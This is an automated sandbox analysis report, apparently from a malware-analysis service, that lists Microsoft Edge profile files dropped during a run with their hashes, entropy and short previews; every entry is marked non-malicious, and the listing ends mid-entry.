                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.845 17e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-08:47:11.847 17e8 Recovering log #3.2024/12/27-08:47:11.848 17e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.189112330006538
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLtDN+q2P923oH+TcwtnG2tMsIFUt8doL6IZZmw+doLRKVkwO923oH+TcwtnG2b:iCDIv4Yebn9GFUt8doZ/+d/5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:EBE61D24F89365B0BB6957EF81F6CFB6
                                                                                                                                                                                                                                                                                    SHA1:5D1CAA8B6BA2A894DABCBEA03944C1C8286E3ED2
                                                                                                                                                                                                                                                                                    SHA-256:64377E47BE2F0A4EDFDFDD4ADCAD5021767B8E5F659E3FB3A97CAFFC663833D3
                                                                                                                                                                                                                                                                                    SHA-512:49C19DEBFC3F1D55F567B8B0D4598569057A23EDC69A4C4225BAD1CD60430B140C91968599B65EFE68ADC8A37C0C6A3B81681549AAD5B42738BFAA6443611D49
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.845 17e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-08:47:11.847 17e8 Recovering log #3.2024/12/27-08:47:11.848 17e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6125514362706509
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWBlfMAqNtMc:TLapR+DDNzWjJ0npnyXKUO8+jOpJmL
                                                                                                                                                                                                                                                                                    MD5:A7FE4237E8C45958975611A663CA10ED
                                                                                                                                                                                                                                                                                    SHA1:EAAC00A92C8C7879BA173D7F457351C282BB47F6
                                                                                                                                                                                                                                                                                    SHA-256:9FDD28579CE9A32B6CEB48D9D923F2194AE307020EB9A8CBDF0D4F838813A84A
                                                                                                                                                                                                                                                                                    SHA-512:E6F7EC53531950CB216F9CC6FF2380FD6226B4AF12BC90D93FABB6AFD93DBB126C07F7A9B84DA2E54FA9ECAF6B9447174D7E12CFCC99F5A55C711055DF0768B9
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...%.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354168944612154
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:VA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:VFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                    MD5:1BFF0065D1347EAA6FB78E0ABD70C1EE
                                                                                                                                                                                                                                                                                    SHA1:5FC47AD5F72066F71ECCCACA25C4C5D0B72E1A5B
                                                                                                                                                                                                                                                                                    SHA-256:5C10923A5947D8274D52885FE729D6AB953C093E46669305EA5DD67C1DD37D09
                                                                                                                                                                                                                                                                                    SHA-512:1221F6440EAC09CF193FB2E301433B11449048714D5F55F4FAF653DE7EBC5B65A4A1CDD77D1D3139330137519CC52CB8CD9D0CCB984922FABFC55EBA42213546
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379780839714515..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.178660128230674
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQXt41923oH+Tcwtk2WwnvB2KLlgQYFN+q2P923oH+Tcwtk2WwnvIFUv:iCtFYebkxwnvFLaNFIv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                    MD5:D78A9DEEB052CCE9A7E4BF1F23EF50A8
                                                                                                                                                                                                                                                                                    SHA1:D752DD2F62534401CF6E4F9FA89E6C858926BD37
                                                                                                                                                                                                                                                                                    SHA-256:F25393AE65374A24C0AC785BDF2BD676EB2818BDF35D98E0E39FDCAED5B6D1A0
                                                                                                                                                                                                                                                                                    SHA-512:1B1D735153A880FDA07DB9841F97B595CF5519891F46F90316499BA88F357944907997AF5BC6A7176F7B067483D1F733AC14B5F2FE11C9063632AE42F3B23EC8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.929 1c28 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-08:47:16.970 1c28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):358860
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324611490518588
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RT:C1gAg1zfvr
                                                                                                                                                                                                                                                                                    MD5:37C5CC3120F4EA4302421D8FD105D1CD
                                                                                                                                                                                                                                                                                    SHA1:925949E442B7209FFF37A89BD45297195EE8BBCB
                                                                                                                                                                                                                                                                                    SHA-256:DF83EFDA8CA57DD6BC7E482CA931EC627BF3501CF63BD7CE4591063E37F842DC
                                                                                                                                                                                                                                                                                    SHA-512:2D46F2BE4D730BCE2A61F2D21BCD8AD7248CB55934D88B06E2CAA42C710AC8FFCD58D11D9D146DAFC4D5DC24BE40230049CCD7018875C52D5CC3E8D6696C26C1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111431335742363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLFKVq2P923oH+Tcwt8aPrqIFUt8doLFKgZmw+doLvIkwO923oH+Tcwt8amLJ:i9Vv4YebL3FUt8d9g/+duI5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:ED722B7E2A37DEA2A8C64F8BD4EC25B8
                                                                                                                                                                                                                                                                                    SHA1:83902A6822BBD1A5992A49FF5A0EE165143913B9
                                                                                                                                                                                                                                                                                    SHA-256:F7CCC7B3C2BBD84CCA8191D79A986916DC864205FA45C7C6ADF644716B451C93
                                                                                                                                                                                                                                                                                    SHA-512:F44EA046ADD082FD6D90626AD2A418D1E445848B1BC24E7BDD5A8979008EFDC104759D0C914BDC9791D8BD90BFEF347F10400F06B000392922639F5197D36763
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.800 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-08:47:11.800 440 Recovering log #3.2024/12/27-08:47:11.801 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159441589454448
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLdKVq2P923oH+Tcwt865IFUt8doLcwgZmw+doLcwIkwO923oH+Tcwt86+ULJ:itVv4Yeb/WFUt8dJwg/+dJwI5LYeb/+e
                                                                                                                                                                                                                                                                                    MD5:2EEC3A2C5A9FAE2FE877BD4948233C15
                                                                                                                                                                                                                                                                                    SHA1:1FCFB62468900C8572D186FA70241E9CD3816E5D
                                                                                                                                                                                                                                                                                    SHA-256:34C61D38C45F8D482EDE5C2373D334B0082EE7D60AAB4C517D3C8A8139AC2597
                                                                                                                                                                                                                                                                                    SHA-512:7E097FB80561C15F44589FF9E3D55823ABFE51828E8C15A0C8D4AD82F57A9CB5B2374D2EFC367FAD777954CF09B0F158AC06F138B1F4A9E1BBD5CF6A9CF6D15B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.844 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-08:47:11.845 440 Recovering log #3.2024/12/27-08:47:11.845 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.205795244619366
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ilq2P923oH+Tcwt8NIFUt8drkXZmw+drkFkwO923oH+Tcwt8+eLJ:ilv4YebpFUt8dE/+dk5LYebqJ
                                                                                                                                                                                                                                                                                    MD5:7316F947CDBEDD12D77803E487C63220
                                                                                                                                                                                                                                                                                    SHA1:B78598745E0F91B9983E9E0152A8C218D28AA23F
                                                                                                                                                                                                                                                                                    SHA-256:944D5A03251CE88B354F2288935DA90B76978FFA45B55508BD8B951ADDB1CCDD
                                                                                                                                                                                                                                                                                    SHA-512:8F903F766D2D942179A4E392637F6DC37F7E7008E50981F1A6D924ED4DA1AE6AF1A2F3110CBFFC0EF0A82B27A5613D2EF1F330EAA0ACCAA6D7DDC4E0DC1C94E2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.551 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-08:47:12.555 1b90 Recovering log #3.2024/12/27-08:47:12.555 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.205795244619366
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ilq2P923oH+Tcwt8NIFUt8drkXZmw+drkFkwO923oH+Tcwt8+eLJ:ilv4YebpFUt8dE/+dk5LYebqJ
                                                                                                                                                                                                                                                                                    MD5:7316F947CDBEDD12D77803E487C63220
                                                                                                                                                                                                                                                                                    SHA1:B78598745E0F91B9983E9E0152A8C218D28AA23F
                                                                                                                                                                                                                                                                                    SHA-256:944D5A03251CE88B354F2288935DA90B76978FFA45B55508BD8B951ADDB1CCDD
                                                                                                                                                                                                                                                                                    SHA-512:8F903F766D2D942179A4E392637F6DC37F7E7008E50981F1A6D924ED4DA1AE6AF1A2F3110CBFFC0EF0A82B27A5613D2EF1F330EAA0ACCAA6D7DDC4E0DC1C94E2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.551 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-08:47:12.555 1b90 Recovering log #3.2024/12/27-08:47:12.555 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 13, cookie 0x3, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):53248
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4137807771681827
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:Fj9P0PQkQer7773pLOgam6IUcnjl0hWP/KbtzRKToaAu:FdCe2773njl0AP/cRKcC
                                                                                                                                                                                                                                                                                    MD5:732B8CE5F371D87857C3D9E0ED0CC6CF
                                                                                                                                                                                                                                                                                    SHA1:88732244DA9F1D7B0B1C61CF5EA2E145E9A2E444
                                                                                                                                                                                                                                                                                    SHA-256:2DE16BC54D056E199FA50ADB1ED5E60AF1B825582E66342458A25C83BCDF66F1
                                                                                                                                                                                                                                                                                    SHA-512:E8666303C8764F46C5E26E3B5538DADEF0AF323F4A035D4AD5B1827083D491BEE9F8502705103A35EAE7FDD65D0F09C3C066DA30DE861957321837D046AFEE2B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238926200464801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iE+Av4Yeb8rcHEZrELFUt8dgh/+dg75LYeb8rcHEZrEZSJ:/4Yeb8nZrExg8+VtLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:CEE7AA09767163AD28E2D146210C18D7
                                                                                                                                                                                                                                                                                    SHA1:84D54F7EB74AFBD9653770193F155B74AC69A6FB
                                                                                                                                                                                                                                                                                    SHA-256:91CDCBEAB588F7DA5530C7AB0C1379F92BC7DFD3C54C91B464B1628B002A5854
                                                                                                                                                                                                                                                                                    SHA-512:C1E23919B345E85FE74B7A48AB5E409D1D965DFD8A92337CFEFB0096EC5D2E6FE114CA3ABCC55E29B229513EC78DDCBFB986D6530595D559A78F34830A26598D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.040 1a20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-08:47:16.041 1a20 Recovering log #3.2024/12/27-08:47:16.041 1a20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1342
